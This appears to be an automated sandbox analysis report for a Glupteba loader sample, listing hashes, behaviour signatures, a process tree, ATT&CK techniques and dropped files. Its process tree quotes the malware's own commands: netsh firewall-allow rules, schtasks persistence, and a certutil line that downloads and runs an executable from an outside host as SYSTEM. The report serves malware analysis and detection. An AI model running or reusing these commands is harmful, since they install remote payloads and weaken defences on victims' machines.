Analysis

  • max time kernel
    153s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 22:58

General

  • Target

    ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50.exe

  • Size

    3.8MB

  • MD5

    46ef84ad1967bf08f4f7c9333e9cb478

  • SHA1

    ad29ef66c1d810026620273a1f3bde534e4fef73

  • SHA256

    ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50

  • SHA512

    5b79e318406a9f2bfece6f928eebfe605ab0c79c02387e1760a1106b33a8caeeaaa1550e4a2ced336f90af2c65d20b37ec3d42ef89f2ed950d3d76babc0089e8

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50.exe
    "C:\Users\Admin\AppData\Local\Temp\ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2344
    • C:\Users\Admin\AppData\Local\Temp\ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50.exe
      "C:\Users\Admin\AppData\Local\Temp\ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4672
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:4396
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4584
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b.exe" enable=yes
            4⤵
              PID:2396
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:224
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:4848
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3960
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2504
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:3972
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4776

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        46ef84ad1967bf08f4f7c9333e9cb478

        SHA1

        ad29ef66c1d810026620273a1f3bde534e4fef73

        SHA256

        ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50

        SHA512

        5b79e318406a9f2bfece6f928eebfe605ab0c79c02387e1760a1106b33a8caeeaaa1550e4a2ced336f90af2c65d20b37ec3d42ef89f2ed950d3d76babc0089e8

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        46ef84ad1967bf08f4f7c9333e9cb478

        SHA1

        ad29ef66c1d810026620273a1f3bde534e4fef73

        SHA256

        ea68c5846f0ce9e6b1fffe45d0265cdb2763767d3aa7f9d726eb350631dfbe50

        SHA512

        5b79e318406a9f2bfece6f928eebfe605ab0c79c02387e1760a1106b33a8caeeaaa1550e4a2ced336f90af2c65d20b37ec3d42ef89f2ed950d3d76babc0089e8

      • memory/224-147-0x0000000000400000-0x000000000445D000-memory.dmp
        Filesize

        64.4MB

      • memory/224-144-0x0000000006600000-0x00000000069A7000-memory.dmp
        Filesize

        3.7MB

      • memory/224-141-0x0000000000000000-mapping.dmp
      • memory/2180-134-0x0000000000000000-mapping.dmp
      • memory/2344-131-0x0000000006700000-0x0000000006DF6000-memory.dmp
        Filesize

        7.0MB

      • memory/2344-132-0x0000000000400000-0x000000000445D000-memory.dmp
        Filesize

        64.4MB

      • memory/2344-130-0x0000000006355000-0x00000000066FC000-memory.dmp
        Filesize

        3.7MB

      • memory/2396-140-0x0000000000000000-mapping.dmp
      • memory/2504-148-0x0000000000000000-mapping.dmp
      • memory/3960-146-0x0000000000000000-mapping.dmp
      • memory/3972-150-0x0000000000000000-mapping.dmp
      • memory/4396-135-0x0000000000000000-mapping.dmp
      • memory/4584-139-0x0000000000000000-mapping.dmp
      • memory/4672-138-0x0000000000400000-0x000000000445D000-memory.dmp
        Filesize

        64.4MB

      • memory/4672-137-0x0000000006490000-0x0000000006B86000-memory.dmp
        Filesize

        7.0MB

      • memory/4672-136-0x00000000060DC000-0x0000000006483000-memory.dmp
        Filesize

        3.7MB

      • memory/4672-133-0x0000000000000000-mapping.dmp
      • memory/4848-145-0x0000000000000000-mapping.dmp